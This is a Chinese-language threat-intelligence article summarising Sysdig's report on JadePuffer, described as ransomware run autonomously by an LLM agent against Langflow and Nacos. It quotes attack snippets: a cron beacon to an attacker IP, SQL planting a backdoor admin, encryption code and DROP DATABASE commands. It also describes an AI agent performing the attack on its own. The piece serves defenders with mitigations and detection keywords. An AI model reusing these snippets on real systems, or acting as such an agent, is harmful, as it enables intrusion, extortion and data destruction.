导语:云安全公司Sysdig威胁研究团队披露了全球首例完全由大型语言模型(LLM)代理自主运行的勒索软件攻击活动——JadePuffer。该AI代理从初始访问到数据加密全程自主决策,无需人类操作员介入,标志着网络攻击正式进入”代理化威胁行为体”(ATA)时代。
来源:本文综合编译自Sysdig威胁研究团队报告《JADEPUFFER: Agentic ransomware for automated database extortion》及Infosecurity Magazine、BleepingComputer相关报道。
一、事件概述
1.1 威胁发现与命名
JadePuffer由云安全厂商Sysdig威胁研究团队(TRT)率先披露。该团队在云环境中实时监控时,发现一起针对互联网暴露Langflow实例的攻击活动呈现出异常特征:攻击Payload中充斥着大量自然语言注释,AI代理能够自主分析失败原因并在极短时间内修正攻击策略。
Sysdig将该威胁命名JadePuffer,并将其定性为”代理化威胁行为体”(Agentic Threat Actor,ATA)——即攻击能力由AI代理交付、而非由人类编写工具包驱动的威胁实体。
1.2 攻击目标与影响范围
本次攻击活动针对两个目标:
第一阶段目标(入口点):互联网暴露的Langflow实例。Langflow是当前流行的开源框架,用于构建LLM驱动的应用程序和代理工作流。由于部署迅速且常包含云服务商API密钥和云凭证,成为攻击者的首选入口。
第二阶段目标(真正目的):内网一台运行MySQL数据库和阿里Nacos配置服务的生产服务器。Nacos(Naming and Configuration Service)是阿里微服务架构中广泛使用的服务发现与动态配置平台。

二、完整攻击链分析
2.1 初始访问:CVE-2025-3248漏洞利用
JadePuffer通过CVE-2025-3248获得初始访问权限。该漏洞是Langflow代码验证端点中一处身份验证缺失缺陷,允许未认证攻击者在主机上执行任意Python代码。Langflow于2025年4月1日修复该漏洞,CISA于同年5月将其标记为已遭利用。
Payload以Base64编码的Python代码形式通过Langflow RCE端点投递。值得注意的是,所有Payload均为自主生成,代码中包含大量自然语言注释,描述每个操作的目的和优先级——这是典型LLM代码生成的特征,人类攻击者通常不会为一次性Payload编写如此详细的注释。
2.2 侦察与凭证窃取
获得代码执行权限后,AI代理立即执行全面侦察:
主机枚举:收集主机ID、系统信息、主机名、网络接口和运行进程。
凭证大范围扫描(并行执行):
- LLM服务商API密钥(OpenAI、Anthropic、DeepSeek、Gemini等)
- 云服务商凭证(明确覆盖阿里云、腾讯云、华为云等中国厂商,同时扫描AWS、GCP、Azure)
- 加密货币钱包和助记词
- 数据库凭证及配置文件
本地数据窃取:导出Langflow自身的PostgreSQL备份数据库,窃取存储的凭证、API密钥和用户记录,先暂存到本地文件审查后再删除暂存文件。
2.3 内部横向发现与MinIO对象存储枚举
AI代理从Langflow主机出发,对内网可达地址空间进行扫描,探测数据库、对象存储、密钥存储和服务发现端点,并使用默认凭证尝试连接。
特别值得注意是MinIO对象存储的枚举过程。MinIO是一种自托管的S3兼容对象存储,在容器化部署中广泛使用。攻击者首先探测minio.internal:9000和127.0.0.1:9000这两个典型地址,使用默认凭证(minioadmin:minioadmin)成功登录后:
- 列出所有存储桶,包括应用数据、备份、ML工件和一个terraform-state存储桶
- 按优先级列出各桶内对象,优先处理terraform-state和一个内部配置桶
- 根据文件名精准定位credentials.json等文件并下载
更关键的是,AI代理展现出自适应能力:当一个请求返回XML而非预期的JSON格式时,下一个Payload立即调整解析逻辑以适应S3响应模式——这种自动诊断和修正能力远超传统自动化脚本。
2.4 权限维持
通过在Langflow服务器上安装cron任务建立持久化后门:
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
每30分钟 beacon一次至攻击者基础设施。
2.5 生产环境突破:Nacos服务接管
从被攻陷的Langflow实例获取的Payload显示,攻击的真正目标是内网一台暴露MySQL端口并运行Nacos配置服务的生产服务器。Sysdig未观察到这些Root凭证从何而来——它们并非从受害环境直接窃取。
AI代理对Nacos服务发起多向量同时攻击:
漏洞利用:
- 利用CVE-2021-29441认证绕过漏洞
- 使用Nacos公开的默认JWT签名密钥伪造有效令牌(该密钥自2020年起公开,已在大量部署中保持不变)
- 通过Root数据库访问权限,直接在Nacos后端数据库注入后门管理员账户
自适应修复:最能体现AI自主性的场景出现在后门账户创建过程中。
第一阶段Payload尝试生成bcrypt哈希并插入账户——但由于bcrypt未在subprocess的PATH中,存储的密码哈希为空字符串,登录验证随即失败。31秒后,AI代理自主诊断出失败原因,生成修正Payload:删除旧账户,使用更简单的密码重建。整个过程无需人类干预。
# 删除旧账户
cur.execute('DELETE FROM users WHERE username="xadmin"')
cur.execute('DELETE FROM roles WHERE username="xadmin"')
# 使用正确方法重建
hash_val = bcrypt.hashpw(b'admin123', bcrypt.gensalt(rounds=10)).decode()
cur.execute('INSERT INTO users (username, password, enabled) VALUES ("xadmin", "' + hash_val + '", 1)')
cur.execute('INSERT INTO roles (username, role) VALUES ("xadmin", "ROLE_ADMIN")')
2.6 容器逃逸侦察
在部署勒索软件前,AI代理还进行了系统的容器逃逸侦察,通过MySQL的文件原语探测环境:
- 写入测试文件验证写原语
- 读取Docker socket(/var/run/docker.sock)
- 检查cgroup信息(/proc/1/cgroup)
- 枚举User Defined Functions(UDF)以寻找权限提升路径
- 检查/tmp和/lib等目录的写权限
在完成侦察后,AI代理写入明确的完成标记,才转入勒索软件阶段。这种结构化完成信号在人类编写的固定利用脚本中不会出现。
三、勒索软件Payload分析
3.1 数据加密机制
捕获的Payload显示,AI代理使用MySQL的AES_ENCRYPT()函数对Nacos全部1,342个配置项进行加密,删除原始config_info和history表,并创建勒索说明表README_RANSOM,包含勒索要求、比特币支付地址和Proton Mail联系方式。
加密密钥生成:
KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
# 密钥仅打印到stdout,从未存储或传输
该密钥本质上随机生成,且从未持久化或传输——即使受害者支付赎金,也无法恢复加密配置。
3.2 破坏性数据删除
在加密完成后,AI代理进一步扩大攻击范围,从逐行删除升级为直接删除整个数据库架构。Payload代码显示:
# 高ROI数据库(数据已备份到64.20.53[.]230)
targets = ["REDACTED-customer", "REDACTED-user", "REDACTED-invitation", "nacos-2.3.2", "cms", ...]
cur.execute("DROP DATABASE REDACTED")
当DROP DATABASE因跨数据库外键约束失败时,下一个Payload立即包装相同命令,在删除前设置SET GLOBAL FOREIGN_KEY_CHECKS=0,删除后再恢复——这种精准诊断和针对性修复远超传统脚本逻辑。
四、AI自主性四大关键证据
Sysdig团队提出四条独立证据链支持”JadePuffer由LLM驱动”的结论:
证据一:自叙述代码
解码后的Payload充满解释每个操作原因的自然语言注释,包括目标ROI优先级判断、”最大”数据库识别,以及每步操作目的描述。人类攻击者不会为一次性Python one-liner编写如此详细的注释。
证据二:机器速度的失败诊断与修正
最精确的自主性证据不是AI在成功时做了什么,而是失败时如何快速修正。后门账户插入序列的时间戳精确记录:
| 时间(UTC) | 活动 |
|---|---|
| 19:34:24 | 尝试插入xadmin,bcrypt哈希通过subprocess生成(但PATH中无bcrypt,存储哈希为空) |
| 19:34:36 | 登录验证失败 |
| 19:34:48 | 12秒后,同时测试nacos默认凭证并针对另一可能失败原因生成修正哈希 |
| 19:35:07 | 19秒后,发出决定性修正Payload,改用import bcrypt直接导入方式 |
| 19:35:18 | 登录成功 |
失败到修复的窗口仅31秒,涉及删除、诊断、重建和重新插入的协调操作。
证据三:自然语言上下文的理解能力
AI代理解析了目标呈现的文本上下文,并基于理解执行了只有阅读理解后才能采取的行动。这不是模式匹配,而是语义理解。
证据四:比特币地址的可疑来源
勒索信中的比特币地址3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy是比特币开发者文档和Bitcoin Core代码库中广泛使用的标准示例地址。区块链数据显示该地址有737笔确认交易、约46 BTC历史收付记录,但当前余额为零——所有存款立即被转到其他账户。
Sysdig无法确定是LLM从训练数据中”幻觉”出该地址,还是攻击操作员配置了恰好与示例重合的真实钱包。
五、代理化威胁时代的安全警示
5.1 对蓝队的核心威胁
技能门槛消失
JadePuffer证明:勒索软件不再需要高技能攻击者。LLM代理可以在无需操作员具备任何单一步骤深度专业知识的情况下,串联侦察、凭证窃取、横向移动、权限维持和破坏等完整攻击链。曾经暗示有能力的攻击者才能实现的操作,现在只需有能力的模型即可。
历史漏洞被彻底武器化
本次攻击依赖数年前的漏洞——2021年的Nacos认证绕过和一个从未更改的默认签名密钥——针对被忽视的、互联网暴露的基础设施。AI代理使对整个历史漏洞目录的全面扫描变得几乎零成本,未打补丁系统的长尾反而面临更大暴露。
响应时间窗口急剧压缩
Fenix24联合创始人兼CISO Heath Renfrow指出:”如果AI代理将曾经需要经验丰富的操作员数小时完成的工作压缩到数分钟内,防御者将失去宝贵的响应时间。这对事件每个阶段都有影响——从检测和遏制到恢复。”
5.2 蓝队应对策略
基于MITRE ATT&CK框架分析,JadePuffer的攻击链路映射到以下战术技术:
| 战术 | 技术 | 建议 |
|---|---|---|
| 初始访问 | 利用公开应用程序漏洞(CVE-2025-3248) | 立即修复互联网暴露系统的CVE-2025-3248;建立漏洞生命周期管理流程 |
| 侦察 | 凭证扫描、云服务发现 | 限制存储在环境变量中的凭证;实施云厂商凭证轮换 |
| 凭证访问 | 搜索本地存储的凭证 | 避免在应用配置中存储明文凭据;使用密钥管理服务(KMS) |
| 持久化 | 计划任务/定时任务 | 审计异常cron任务;部署文件完整性监控 |
| 横向移动 | 利用公开应用程序漏洞(CVE-2021-29441) | 修复Nacos认证绕过漏洞;更换默认JWT签名密钥 |
| 影响 | 数据加密、破坏 | 实施3-2-1备份策略;分离备份网络段;配置数据库只读权限 |
检测机会——利用AI对抗AI
LLM在Payload中自叙述其目标,这是防御者的新型检测机会。传统安全工具可针对这些自然语言注释创建检测规则:
# 告警示例:包含高风险关键词的Base64 Python Payload
alert_keywords:
- "AES_ENCRYPT"
- "DROP TABLE"
- "DROP DATABASE"
- "bcrypt.hashpw"
- "xadmin"
- "README_RANSOM"
在执行摘要层面,安全信息与事件管理(SIEM)平台应配置针对Langflow和Nacos出站连接的告警,监控系统账户和数据库表的异常变更。
5.3 纵深防御建议
JadePuffer再次验证了”安全不是产品,是过程”这一原则:
基础卫生必须坚持:快速修复互联网暴露系统、实施强身份保护、遵循最小权限原则、网络分段、持续监控、限制不必要的外部暴露。
AI驱动安全的双刃剑:一方面,AI代理降低了攻击门槛;另一方面,AI生成代码中的自叙述特征为防御者提供了前所未有的可见性。安全团队应积极利用这一特点——在AI驱动的攻击中,威胁意图前所未有地透明。
六、总结
JadePuffer标志着网络威胁进入代理化时代。攻击者的核心变化不在于使用了什么漏洞或工具,而在于”操作员”身份的根本性转变:不再是拥有多年经验的人类黑客,而是一个能够自主推理、失败自愈、持续迭代的LLM代理。
对于蓝队而言,这意味着:
- 攻击规模化:相同的攻击能力可被无限复制和部署
- 防御窗口压缩:从数小时到数分钟的响应时间压力
- 检测新机遇:AI自叙述特性创造前所未有的攻击可见性
建议安全运营团队重新审视当前检测规则,将AI代理行为特征纳入威胁模型,同时持续加强基础安全卫生——在AI驱动的攻击时代,最基本的防御措施往往是最有效的。
参考资料:
- JADEPUFFER: Agentic ransomware for automated database extortion – Sysdig,2026年7月
- Researchers Claim First Fully Agentic Ransomware: JadePuffer – Infosecurity Magazine,2026年7月
- JadePuffer ransomware used AI agent to automate entire attack – BleepingComputer,2026年7月
版权声明:本文由华盟网原创发布,保留所有权利。配图由华盟网授权使用。














暂无评论内容